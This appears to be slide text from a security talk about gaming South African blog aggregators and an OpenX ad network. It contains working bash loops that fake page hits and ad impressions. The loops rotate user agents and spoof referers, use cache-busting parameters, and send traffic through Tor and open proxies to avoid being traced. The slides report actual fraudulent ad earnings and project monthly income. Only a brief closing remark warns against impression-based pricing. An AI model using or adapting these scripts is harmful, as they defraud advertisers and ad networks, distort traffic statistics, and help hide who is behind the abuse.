Post on 15-May-2015
description
If you’re not famous, fake it.
Shaun Dewberry Unix/Security guy Pretoria University (expelled for hacking!) aka LowVoltage
Technorati.com In SA:
Amatomu.com Afrigator.co.za
Blogger pissing contest
<!-‐-‐ Start AMATOMU.COM code -‐-‐> <img height='1' style='display:none' width='1' src='http://www.amatomu.com/log.php?cid=a433e87b0ebYe493dc055153ae332be0eeda46c' />
<!-‐-‐ End AMATOMU.COM code -‐-‐>
Slow Not really automated Boring Obvious Traceable
while [ 1 ] do wget http://www.amatomu.com/log.php?
cid=a433e87b0eb>e493dc055153ae332be0eeda46c done;
Don’t crash the server! More random log entries #!/bin/sh Set RANDOM=$$ while [ 1 ] do let "delay = RANDOM % 30"; # Random 0 to 30 Second delay wget http://www.amatomu.com/log.php?
cid=a433e87b0eb>e493dc055153ae332be0eeda46c echo "Waiting $delay seconds" sleep $delay done;
#!/bin/bash set RANDOM=$$ while [ 1 ] do let "delay = RANDOM % 6"; wget -‐-‐delete-‐after http://afrigator.com/track/5013-‐none.gif sleep $delay; done;
wget User-‐Agent visible in server logs All visits from same source IP address
http://www.user-‐agent.org "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR
2.0.50727; .NET CLR 3.0.04506.30 Mozilla/5.0 (Windows; U; Windows NT 6.0; en-‐US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-‐US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 Mozilla/5.0 (X11; U; Linux i686; en-‐US; rv:1.9.0.2) Gecko/2008092313 Ubuntu/8.04 (hardy)
Firefox/3.1 Mozilla/5.0 (Windows; U; Windows NT 6.0; en-‐US; rv:1.9.0.2) Gecko/2008091620 Firefox/3.0.2 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-‐US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.0 Mozilla/5.0 (Windows; Windows NT 5.1; en-‐US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9 Mozilla/5.0 (Windows; U; Windows NT 5.1; en_US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.7 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-‐US) AppleWebKit/525.19 (KHTML, like Gecko)
Chrome/0.4.154.18 Safari/525.19
set RANDOM=$$ while [ 1 ] do let "delay = RANDOM % 30" let "ua = RANDOM % `wc -‐l useragents.txt | awk '{print $1}'` + 1" uastring=`sed -‐n ${ua}p useragents.txt;` wget -‐q -‐-‐delete-‐after -‐-‐user-‐agent="$uastring" http://
www.amatomu.com/log.php?cid=a433e87b0eb>e493dc055153ae332be0eeda46c
sleep $delay done;
“Tor protects you by bouncing your communications around a distributed network of relays run by volunteers all around the world: it prevents somebody watching your Internet connection from learning what sites you visit, and it prevents the sites you visit from learning your physical location.” -‐-‐torproject.org
wget tsocks tor Aggregator
• tsocks.sourceforge.net – Transparent Socks Proxy
#20 of 31 “top non-‐US startups to watch worldwide” by Business 2.0 (money.cnn.com)
Top 10 International Products for 2008 – ReadWriteWeb
Acquired by Naspers Blah blah blah… WTF? Security Anyone?
Invitations to launches More traffic (ironic, isn’t it?) Gadgets for review Press accreditation Fake a career as a social media expert
Social engineering hack
Ad network linking bloggers and advertisers Revenue based on CPM (ad impressions)
CPM is horribly broken
<!-‐-‐/* Adgator.co.za Javascript Tag v2.6.3 */-‐-‐> <script type='text/javascript'><!-‐-‐//<![CDATA[ var m3_u = (location.protocol=='https:'?'https://ads.adgator.co.za/delivery/ajs.php':'http://ads.adgator.co.za/delivery/ajs.php'); var m3_r = Math.floor(Math.random()*99999999999); if (!document.MAX_used) document.MAX_used = ','; document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u); document.write ("?zoneid=471"); document.write ('&cb=' + m3_r); if (document.MAX_used != ',') document.write ("&exclude=" + document.MAX_used); document.write (document.charset ? '&charset='+document.charset : (document.characterSet ?
'&charset='+document.characterSet : '')); document.write ("&loc=" + escape(window.location)); if (document.referrer) document.write ("&referer=" + escape(document.referrer)); if (document.context) document.write ("&context=" + escape(document.context)); if (document.mmm_fo) document.write ("&mmm_fo=1"); document.write ("'><\/scr"+"ipt>"); //]]>-‐-‐></script><noscript><a href='http://ads.adgator.co.za/delivery/ck.php?n=ad677422&cb=INSERT_RANDOM_NUMBER_HERE'
target='_blank'><img src='http://ads.adgator.co.za/delivery/avw.php?zoneid=471&n=ad677422' border='0' alt='' /></a></noscript>
Only care about ad image: http://ads.adgator.co.za/delivery/avw.php?zoneid=471&n=ac71ad4f
No ads are served to wget?? OpenX Ad Server If no cookie gets set, then no ad gets served Certain User Agents are ignored First ad served, but no ads thereafter (caching?)
Geo-‐targeting
Accept cookies (and turf them) &cb=RANDOM parameter (Cache blocking) tor nodes in ZA? Zombie TelkomADSL botnet? Open proxy servers – Proof of Concept
let "delay = RANDOM % 40" # Up to 40 second delay – let’s not be greedy let "prand = RANDOM % `wc -‐l proxies.txt | awk '{print $1}'` + 1" http_proxy=`sed -‐n ${prand}p proxies.txt;` # select a random proxy let "ua = RANDOM % `wc -‐l useragents.txt | awk '{print $1}'` + 1" uastring=`sed -‐n ${ua}p useragents.txt;` # random useragent let "rand = RANDOM % 999999999" # random integer for cache blocking if [ $http_proxy == "tsocks" ]; then # 1/3rd of the time route through tor export http_proxy= /usr/bin/tsocks /usr/local/bin/wget -‐-‐no-‐clobber -‐-‐no-‐cache -‐-‐max-‐redirect=0 -‐-‐
user-‐agent="$uastring" -‐-‐referer=http://ramboguy.co.za "http://ads.adgator.co.za/delivery/avw.php?zoneid=471&n=ac71ad4f&cb=$rand"
else # otherwise request the ad straight through the SA proxy /usr/bin/wget -‐d -‐-‐no-‐clobber -‐-‐no-‐cache -‐-‐user-‐agent="$uastring" -‐-‐referer=http://ramboguy.co.za "http://ads.adgator.co.za/delivery/avw.php?zoneid=471&n=ac71ad4f&cb=$rand"
fi
• 90 Ad impressions/day
• Paid Ads Served: 224
• Earnings: R11.09
• 800 impressions/day (2 hour run)
• 1677 Paid Ads Served
• Earnings: R86.58
Automated auditing with complex analysis tools
Don’t use impression based costing models (duh!)
R8 per hour (conservative) 24 hours 30 days
R 5 760 per month Mahala
The beer’s on me!